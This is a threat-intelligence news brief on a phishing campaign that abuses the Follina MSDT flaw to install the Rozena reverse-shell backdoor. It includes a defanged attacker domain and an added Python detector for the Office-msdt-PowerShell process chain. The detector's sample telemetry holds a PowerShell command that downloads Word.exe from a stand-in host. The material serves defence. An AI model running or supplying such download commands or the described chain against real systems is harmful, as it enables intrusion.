Researchers have spotted a phishing campaign abusing the recently disclosed Follina security vulnerability (CVE-2022-30190). The attackers are distributing the Rozena backdoor on Windows systems.

About the Rozena backdoor

Rozena is a backdoor-type malware that opens a remote shell connection back to the malware author. Once that connection is established, the compromised host can be used to reach the other systems connected to the network.
  • Researchers from Fortinet FortiGuard Labs have discovered the Rozena campaign exploiting the Follina flaw, an RCE vulnerability that exists in the Microsoft Windows Support Diagnostic Tool (MSDT).
  • The attack chain makes use of a weaponized Office document that, once opened, connects to an external Discord CDN URL to obtain an HTML file named index[.]htm.
  • Subsequently, the HTML file uses the msdt[.]exe tool, along with a PowerShell command, which invokes another web request to obtain the Rozena backdoor and store it as Word[.]exe.

Additional insights

  • The main aim of Rozena is to inject a shellcode that executes a reverse shell to the attacker’s machine (microsofto[.]duckdns[.]org), enabling them to take full control of the system.
  • Once the Rozena payload is executed, it creates a process for a PowerShell command. According to experts, the decoded command does only one job: injecting the shellcode.
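The process chain described above (Office document, msdt.exe, a PowerShell download of Word.exe) is what a defender would look for in endpoint process-creation telemetry. The following is an added detection example, not code from the report or from Fortinet; it assumes a constructed, Sysmon-like event shape (pid, parent pid, image name, command line) and that msdt.exe launches its PowerShell through the sdiagnhost.exe diagnostic host.

```python
from dataclasses import dataclass

# Office applications whose child msdt.exe is suspicious (assumed list).
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # lower-case basename of the executable
    cmdline: str


def ancestors(event, by_pid):
    """Walk the parent chain of an event, yielding each ancestor event."""
    seen = set()
    cur = by_pid.get(event.ppid)
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def detect_follina_chain(events):
    """Return (pid, reason) findings for the Follina/Rozena pattern:
    an Office application spawning msdt.exe, and a PowerShell process
    anywhere under that msdt.exe that performs a web request."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if e.image == "msdt.exe":
            parent = by_pid.get(e.ppid)
            if parent and parent.image in OFFICE_IMAGES:
                findings.append((e.pid, f"{parent.image} spawned msdt.exe"))
        elif e.image == "powershell.exe":
            if any(a.image == "msdt.exe" for a in ancestors(e, by_pid)):
                cmd = e.cmdline.lower()
                if any(k in cmd for k in ("invoke-webrequest", "downloadfile", "http")):
                    findings.append((e.pid, "powershell under msdt.exe performs a web request"))
    return findings


# Constructed sample telemetry (not real logs) mirroring the chain in the report.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe", '"WINWORD.EXE" /n invoice.docx'),
    ProcEvent(300, 200, "msdt.exe", "msdt.exe <constructed arguments>"),
    ProcEvent(400, 300, "sdiagnhost.exe", "sdiagnhost.exe -Embedding"),
    ProcEvent(500, 400, "powershell.exe", "powershell -c Invoke-WebRequest hxxp://example.invalid/Word.exe -OutFile Word.exe"),
    ProcEvent(600, 100, "powershell.exe", "powershell -c Get-Date"),  # benign, must not fire
]
```

Running `detect_follina_chain(SAMPLE_EVENTS)` flags pids 300 and 500 and ignores the benign PowerShell under explorer.exe.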

Conclusion

The Follina vulnerability is now being extensively exploited by cybercriminals to carry out their attacks. Those who haven’t applied the patch are the most exposed to such attacks. Thus, users should apply the patch as soon as possible and use a reliable anti-malware solution.
Cyware Publisher